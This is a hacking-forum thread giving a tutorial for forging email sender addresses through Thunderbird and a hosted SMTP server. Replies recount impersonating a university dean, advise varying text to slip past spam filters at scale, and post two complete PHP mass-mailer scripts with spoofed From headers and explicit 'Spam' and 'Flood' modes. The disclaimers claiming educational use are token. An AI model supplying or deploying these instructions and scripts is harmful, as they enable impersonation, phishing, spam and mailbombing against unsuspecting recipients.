Login Register
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[TuT] Fake email sender the GUI version filter_list
Author
Message
[TuT] Fake email sender the GUI version #1
email recipient will receive email with sender of your choice... you can fake the sender of the email but the recipient cannot reply back.. It is one way communication

Okay.. here are the stuff that you need

1. Mozilla Thunderbird
2. Fastmail.fm email
3. A SMTP enabled hosting

Steps
  1. Register with fastmail.fm
    Just register as free user.. atm fastmail.fm is the only free email service that allow user to send mail via other SMTP. If u are using google, it will not work..
  2. Log in into your cpanel and create one email (urmail@Domain.com.my)
  3. Open Mozilla Thunderbird and add new email..
    • name = put any name
    • email = fastmail.fm email that you registered
    • password = the fastmail.fm password
    Click next and Thunderbird will validate the email, password and server. Click "Create Account"
  4. After that. click on "View setting of this account" at the main screen. A pop-up will appear. Select Outgoing Server (SMTP)
  5. Click "Add".
    • Description just put anything, doesn't matter
    • server name = your mail server (e.g mail.mydomain.com.my - ask your hosting for more info)
    • port = ask your hosting..mine is 25 or 26
    • connection security = none
    • authentication method = i select password, transmitted insecurely but anything can also Tongue
    • username = email that you created in the cpanel (urmail@Domain.com.my)
  6. Click OK to add new SMTP server. It should be in the list of the SMTP.
  7. On the same Account Setting Window, select the email you put earlier (with "-" sign beside it)
    • Account Name = should be the same as you put earlier
    • Your Name = Name that you want the recipient see e.g George W Bush
    • Email Address = name that you want the recipient see e.g georgewbush@whitehouse.com
    • Set outgoing server to SMTP server of your hosting
  8. You are good to go.. :thumbs:

p/s: test the setting by sending email to yourself before making any prank to your friend

this is for educational purpose only.. don't abuse it...

and if u thought this is useful.. gimme some paypal?:rofl: J/K

Reply

RE: [TuT] Fake email sender the GUI version #2
Yes really usefull, but people might be lazy to install Mozilla thunderbird.

Download Portable :
http://portableapps.com/apps/internet/th...d_portable


XD This is also a usefull post lolOlolol.

+Rep you now Smile
[Image: 5DQAS.gif]

May the force be with you...

Reply

RE: [TuT] Fake email sender the GUI version #3
lol
i found it useful when i got barred from exam during my uni time..
an e-mail from the dean to my lecturer really save the day.. :p
thought this might help someone that may have the same problem as me before..

disclaimer : spoofing sender email is a crime.. so does alcohol for underage :rofl:

@Lenalee = +1 for u

Reply

RE: [TuT] Fake email sender the GUI version #4
lol
i found it useful when i got barred from exam during my uni time..
an e-mail from the dean to my lecturer really save the day.. :p
thought this might help someone that may have the same problem as me before..

disclaimer : spoofing sender email is a crime.. so does alcohol for underage :rofl:

@Lenalee = +1 for u

Reply

RE: [TuT] Fake email sender the GUI version #5
Thanks for this! it really helped.

Reply

RE: [TuT] Fake email sender the GUI version #6
plz giv us sme linkz...wherz we can easily send fake mail

Reply

RE: [TuT] Fake email sender the GUI version #7
(07-31-2011, 10:13 AM)YesMan Wrote: Awesome man Biggrin But the mails I send end up in junk in Hotmail :/ Is there any way to make them go to inbox?

inboxing? that is a huge topic to cover :wacko:
there are ways to achieve 100% inbox but that require some hardwork and tools.
U can start with mentioning your friend name in the email itself
1 email no problem, 20 email also np, 20mil email? :whistle:
The next step is u can vary the content of the email it self.
If u want to send email to hundreds your friends, be careful as some SMTP have tendencies to mark 500 same email that run thro their server as SPAM.
Always use spintext to make variations.

Quote:Hi <first name>
I found this {awesome|cool|funny} site. <link> {take a look at|visit|click on|spam|abuse|share} it dude!
as above example, there are 18 variation of email content
(3 variation of blue text and 6 variation of pink text)
if a SMTP limit the same email by 200, by using above spintext already push the ceiling to 3600

btw, u don't have to consider inboxing for fun purpose :nono: :ok:

Reply

RE: [TuT] Fake email sender the GUI version #8
(08-01-2011, 08:53 AM)ahsanciit Wrote: plz giv us sme linkz...wherz we can easily send fake mail

idk other links as i learn this from someone else and has been doing this ever since.
this tut may not be the simplest but it is customizable and ads free.
it is good to do some jokes to your friend in a large scale for a cost of a hosting.

Reply

RE: [TuT] Fake email sender the GUI version #9
(08-01-2011, 08:53 AM)ahsanciit Wrote: plz giv us sme linkz...wherz we can easily send fake mail

Dood, get urself some freehost-shizz .. and drop this "code" into a index.php
Upload ---> voila

Includes::
simple msg
spam
flood

- -

Enjoy,
heres the code


Code:
<? /* (C) NOmeR1 */ ?> <title>Sender Anonym Email :: FLoodeR :: SpameR</title> <? // error_reporting (0); if(!set_time_limit(0)) { $limit = false; } else { set_time_limit(0); ignore_user_abort(1); $limit = true; } $log = 'log.txt'; // Log file ini_set('max_execution_time', '0'); ?> set_time_limit(0) = <?if($limit)echo('<font color=Green>On</font>');else echo('<font color=Red>Off</font> (Working time is limited with the current settings of the server)');?><br> <? $ip = getenv('REMOTE_ADDR'); if($_GET['mail'] == '1' || $_GET['mail'] == '2' || $_GET['mail'] == '3') { $_POST['to'] = stripslashes($_POST['to']); $_POST['msg'] = stripslashes($_POST['msg']); $_POST['from'] = stripslashes($_POST['from']); $_POST['subject'] = stripslashes($_POST['subject']); if($_POST['to'] && $_POST['msg'] && $_POST['from'] && $_POST['tipe']) { $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/".$_POST['tipe']."; charset=windows-1251\r\n"; $headers .= "From: ".$_POST['from']."\n"; if($_GET['mail'] == '1') { mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); } elseif($_GET['mail'] == '2') { $_POST['to'] = explode("\n",$_POST['to']); foreach($_POST['to'] as $poluchatels) { mail($poluchatels, $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); } } elseif($_GET['mail'] == '3') { if(preg_match('/[0-9]+/',$_POST['kol'])) { for($i=0;$i<$_POST['kol'];$i++) { mail($_POST['to'], $_POST['subject'], $_POST['msg'], $headers) or die('Cannot send the message'); sleep(1); } } else { echo('Incorrect (or not entered) number of messages'); } } $f = fopen($log,'a'); fwrite($f,'Message sent &'.$_POST['msg'].'& with subject "'.$_POST['subject'].'" for "'.$_POST['to'].'" from IP - "'.$ip."\"\r\n"); fclose($f); echo('<center><b><font color="green">Message succesfully sent</font></b></center>'); } else { ?> <form style="width:350px" method='post'> <? if($_GET['mail'] == '1' || $_GET['mail'] == '3') { echo("Receiver <input type='text'name='to'><br>"); } ?> Sender <input type='text' name='from'><br> Subject <input type='text' name='subject'><br> <? if($_GET['mail'] == '3') { echo("Amount of messages <input type='text' name='kol'><br>"); } ?> <br> htm -> <input type='radio' checked='checked' tabindex='1' name='tipe' value='html'> :: <input type='radio' name='tipe' value='plain'><- text<br> <? if($_GET['mail'] == '2') { echo("Receivers<br><textarea name='to' rows='10' cols='30'>admin@fbi.org admin@cia.org admin@whitehouse.org</textarea>"); } ?> <br>Message<br> <textarea name='msg' rows='10' cols='30'></textarea><br><br><input type='submit'> </form> <? } } else { ?><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=1'>Send simple message</a><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=2'>Spam</a><br> <a href='<?=$_SERVER['PHP_SELF']?>?mail=3'>Flood</a><br> <? }


Reply

RE: [TuT] Fake email sender the GUI version #10
this is not my code but it is usable and serve the same function as above
PHP Code:
<?php @$action=$_POST['action']; @$from=$_POST['from']; @$realname=$_POST['realname']; @$replyto=$_POST['replyto']; @$subject=$_POST['subject']; @$message=$_POST['message']; @$emaillist=$_POST['emaillist']; @$file_name=$_FILES['file']['name']; @$contenttype=$_POST['contenttype']; @$file=$_FILES['file']['tmp_name']; @$amount=$_POST['amount']; set_time_limit(intval($_POST['timelimit'])); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>PHP Mailer 2011</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <style type="text/css"> <!-- .style1 { font-family: Geneva, Arial, Helvetica, sans-serif; font-size: 12px; } .style2 { font-size: 10px; font-family: Geneva, Arial, Helvetica, sans-serif; } .Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C} .Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000000} .Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000000} .style3 {color: #000000} .style5 { color: #000000; font-size: 24px; } .style6 {color: #FF0000} .style7 {font-size: 24px} --> </style> </head> <body bgcolor="#FFFFFF" text="#000000"> <p><br /> </p> <form name="form1" method="post" action="" enctype="multipart/form-data"> <table width="142" border="0"> <tr> <td width="81"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font> </div> </td> <td width="219"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="from" value="<?php print $from; ?>" size="30" /> </font> </td> <td width="212"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font> </div> </td> <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="realname" value="<?php print $realname; ?>" size="30" /> </font> </td> </tr> <tr> <td width="81"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font> </div> </td> <td width="219"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" /> </font> </td> <td width="212"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font> </div> </td> <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="file" name="file" size="24" /> </font> </td> </tr> <tr> <td width="81"> <div align="right"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font> </div> </td> <td colspan="3" width="703"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <input type="text" name="subject" value="<? print $subject; ?>" size="90" /> </font> </td> </tr> <tr valign="top"> <td colspan="3" width="520"> <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font> </td> <td width="278"> <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email List :</font> </td> </tr> <tr valign="top"> <td colspan="3" width="520"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /> <input type="radio" name="contenttype" value="plain" checked="checked" /> Plain <input type="radio" name="contenttype" value="html" /> HTML <input type="hidden" name="action" value="send" /><br /> Number to send: <input type="text" name="amount" value="1" size="10" /><br /> Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" /> <input type="submit" value="Send" /> </font> </td> <td width="278"> <font size="-3" face="Verdana, Arial, Helvetica, sans-serif"> <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea> </font> </td> </tr> </table> </form> <?php if ($action=="send"){ if (!$from && !$subject && !$message && !$emaillist){ print "Please complete all the fields."; exit; } echo $allemails = split("\n", $emaillist); $numemails = count($allemails); If ($file_name){ if (!file_exists($file)){ die("The file you are trying to upload could not be uploaded to the server"); } $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } for($xx=0; $xx<$amount; $xx++){ for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending e-mail to $to......."; flush(); $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "Sent<br>"; flush(); } } } } ?> <p class="style2">&nbsp;</p> <p class="style1">&nbsp;</p> </body> </html>

make sure your hosting support php

Reply







Users browsing this thread: